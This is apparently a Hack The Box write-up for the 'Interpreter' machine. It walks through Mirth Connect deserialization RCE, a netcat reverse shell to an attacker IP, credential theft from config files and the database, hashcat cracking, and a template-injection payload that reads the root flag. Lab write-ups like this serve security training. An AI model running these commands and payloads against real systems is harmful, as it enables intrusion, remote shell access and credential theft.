Next, we perform a scan to identify open services.

nmap -sC -sV -Pn ip

Explanation:

• -sC runs default scripts for basic enumeration
• -sV detects service versions
• -Pn skips host discovery (useful in VPN environments like HTB)

Scan Results

• Port 22 → SSH (OpenSSH)
• Ports 80 and 443 → Apache web server

This indicates a web-based attack surface.

Web Enumeration

Accessing the website reveals a service running Mirth Connect.

We verify the API endpoint:

https://interpreter.htb/api

The version is identified as:

4.4.0

Initial Foothold — RCE via Mirth Connect

This version is vulnerable to a Java deserialization Remote Code Execution vulnerability.

The application accepts XML input and unsafely processes it, allowing arbitrary command execution.

Exploit Execution

We use a Python script to send a malicious payload.

python3 exploit.py -u https://interpreter.htb -c 'id'

Explanation:

• -u specifies the target URL
• -c defines the command to execute
• id confirms command execution on the target

Successful output confirms remote code execution.

Reverse Shell

We move from command execution to a full shell.

Start a listener on the attacker machine:

nc -lvnp 4444

Trigger reverse shell from the target:

python3 exploit.py -u https://interpreter.htb -c 'nc -c sh 10.10.16.162 4444'

This makes the target connect back to our machine.

Stabilize the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

This improves shell interaction.

We now have access as:

mirth@interpreter

Credential Discovery

We search for configuration files that may contain credentials.

cat /usr/local/mirthconnect/conf/mirth.properties

This file stores database connection details.

Extracted credentials:

User: mirthdb  
Pass: MirthPass123!  
DB: mc_bdd_prod

Database Access

We connect to the local database.

mysql -u mirthdb -p -h 127.0.0.1 mc_bdd_prod

Explanation:

• -u username

-p prompts for password

• -h specifies host

Extract user credentials:

SELECT CONCAT(p.USERNAME, ':', pp.PASSWORD)
FROM PERSON p
JOIN PERSON_PASSWORD pp ON p.ID = pp.PERSON_ID;

Output:

sedric:u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==

Password Cracking

Decode the hash:

echo '<HASH>' | base64 -d | xxd -p

Then format it for cracking and use hashcat:

hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

Recovered credentials:

sedric:snowflake1

User Access

Login via SSH:

ssh [email protected]

Use the cracked password.

Retrieve user flag:

cat user.txt

Privilege Escalation

We enumerate running processes.

ps aux | grep python

We identify a root-owned script:

/usr/local/bin/notif.py

Internal Service Discovery

This script listens on:

127.0.0.1:54321

This means the service is only accessible locally.

Exploitation — Template Injection

We craft a malicious XML payload:

xml='<patient><firstname>{open("/root/root.txt").read()}</firstname><lastname>a</lastname><sender_app>a</sender_app><timestamp>a</timestamp><birth_date>01/01/2000</birth_date><gender>a</gender></patient>'

Explanation:

• The application evaluates expressions inside {}
• We inject Python code to read the root flag

Send the Payload

printf "POST /addPatient HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/xml\r\nContent-Length: %d\r\n\r\n%s" "$(echo -n "$xml" | wc -c)" "$xml" | nc 127.0.0.1 54321

Explanation:

• printf builds a raw HTTP request
• Content-Length ensures proper request formatting
• nc sends the request to the local service

Root Flag

The response contains the contents of:

cat /root/root.txt

Attack Chain Summary

Web Application → Mirth RCE → Shell as mirth  
→ Config file → Database credentials  
→ Crack password → SSH as sedric  
→ Local service exploitation → Template Injection  
→ Root access

Key Takeaways

• Java deserialization vulnerabilities lead to full RCE
• Configuration files often contain sensitive credentials
• Internal services can be abused after initial access
• Template injection can lead directly to root access